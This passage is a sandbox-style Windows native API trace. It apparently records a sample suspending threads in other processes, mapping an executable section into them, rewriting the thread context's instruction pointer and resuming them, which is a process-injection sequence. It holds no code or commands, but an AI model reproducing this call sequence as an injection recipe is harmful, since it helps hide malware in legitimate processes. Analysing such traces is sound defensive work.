NumberOfBytesRead=0x0 | out: Buffer=0xde9f8*, NumberOfBytesRead=0x0) returned 0x0 [0138.531] NtDelayExecution (Alertable=0, Interval=0xde6cc*=-50000000) returned 0x0 [0138.534] NtOpenThread (in: ThreadHandle=0xdea64, DesiredAccess=0x1a, ObjectAttributes=0xde6b0, ClientId=0xde6c8*(UniqueProcess=0x0, UniqueThread=0x1158) | out: ThreadHandle=0xdea64*=0x1a0) returned 0x0 [0138.534] NtSuspendThread (in: ThreadHandle=0x1a0, PreviousSuspendCount=0x0 | out: PreviousSuspendCount=0x0) returned 0x0 [0138.534] NtMapViewOfSection (in: SectionHandle=0x184, ProcessHandle=0x1a4, BaseAddress=0xde704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0xde704*=0x27b0000, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000) returned 0x0 [0138.543] NtGetContextThread (in: ThreadHandle=0x1a0, Context=0xde72c | out: Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x19ff14, Ebx=0x2d4000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x19febc, Eip=0x7561895c, SegCs=0x23, EFlags=0x202, Esp=0x19fea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0138.549] NtCreateSection (in: SectionHandle=0xde6ec, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0xde6ac, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0xde6ec*=0x1a8) returned 0x0 [0138.549] NtMapViewOfSection (in: SectionHandle=0x1a8, ProcessHandle=0xffffffff, BaseAddress=0xde6f4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6ac*=0xcc200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f4*=0x75d0000, SectionOffset=0x0, ViewSize=0xde6ac*=0xcd000) returned 0x0 [0138.557] NtMapViewOfSection (in: SectionHandle=0x1a8, ProcessHandle=0x1a4, BaseAddress=0xde6f0*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6e8*=0xcc200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f0*=0x5e0000, SectionOffset=0x0, ViewSize=0xde6e8*=0xcd000) returned 0x0 [0138.573] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x75d0000) returned 0x0 [0138.577] NtClose (Handle=0x1a8) returned 0x0 [0138.577] NtSetContextThread (ThreadHandle=0x1a0, Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x19ff14, Ebx=0x2d4000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x19febc, Eip=0x619717, SegCs=0x23, EFlags=0x202, Esp=0x19fea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0138.583] NtResumeThread (in: ThreadHandle=0x1a0, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0138.583] NtClose (Handle=0x1a4) returned 0x0 [0138.583] NtClose (Handle=0x1a0) returned 0x0 [0138.584] NtOpenProcess (in: ProcessHandle=0xdea70, DesiredAccess=0x438, ObjectAttributes=0xdea38*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xdea50*(UniqueProcess=0x115c, UniqueThread=0x0) | out: ProcessHandle=0xdea70*=0x1a0) returned 0x0 [0138.584] NtQueryInformationProcess (in: ProcessHandle=0x1a0, ProcessInformationClass=0x1a, ProcessInformation=0xdea60, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0xdea60, ReturnLength=0x0) returned 0x0 [0138.584] NtQueryInformationProcess (in: ProcessHandle=0x1a0, ProcessInformationClass=0x0, ProcessInformation=0xde6e4, ProcessInformationLength=0x18, ReturnLength=0x0 | out: ProcessInformation=0xde6e4, ReturnLength=0x0) returned 0x0 [0138.584] NtReadVirtualMemory (in: ProcessHandle=0x1a0, BaseAddress=0x2bc000, Buffer=0xde9f8, NumberOfBytesToRead=0x20, NumberOfBytesRead=0x0 | out: Buffer=0xde9f8*, NumberOfBytesRead=0x0) returned 0x0 [0138.585] NtDelayExecution (Alertable=0, Interval=0xde6cc*=-50000000) returned 0x0 [0138.589] NtOpenThread (in: ThreadHandle=0xdea64, DesiredAccess=0x1a, ObjectAttributes=0xde6b0, ClientId=0xde6c8*(UniqueProcess=0x0, UniqueThread=0x1160) | out: ThreadHandle=0xdea64*=0x1a4) returned 0x0 [0138.589] NtSuspendThread (in: ThreadHandle=0x1a4, PreviousSuspendCount=0x0 | out: PreviousSuspendCount=0x0) returned 0x0 [0138.589] NtMapViewOfSection (in: SectionHandle=0x184, ProcessHandle=0x1a0, BaseAddress=0xde704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0xde704*=0x2270000, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000) returned 0x0 [0138.599] NtGetContextThread (in: ThreadHandle=0x1a4, Context=0xde72c | out: Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x19ff14, Ebx=0x2bc000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x19febc, Eip=0x7561895c, SegCs=0x23, EFlags=0x202, Esp=0x19fea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, 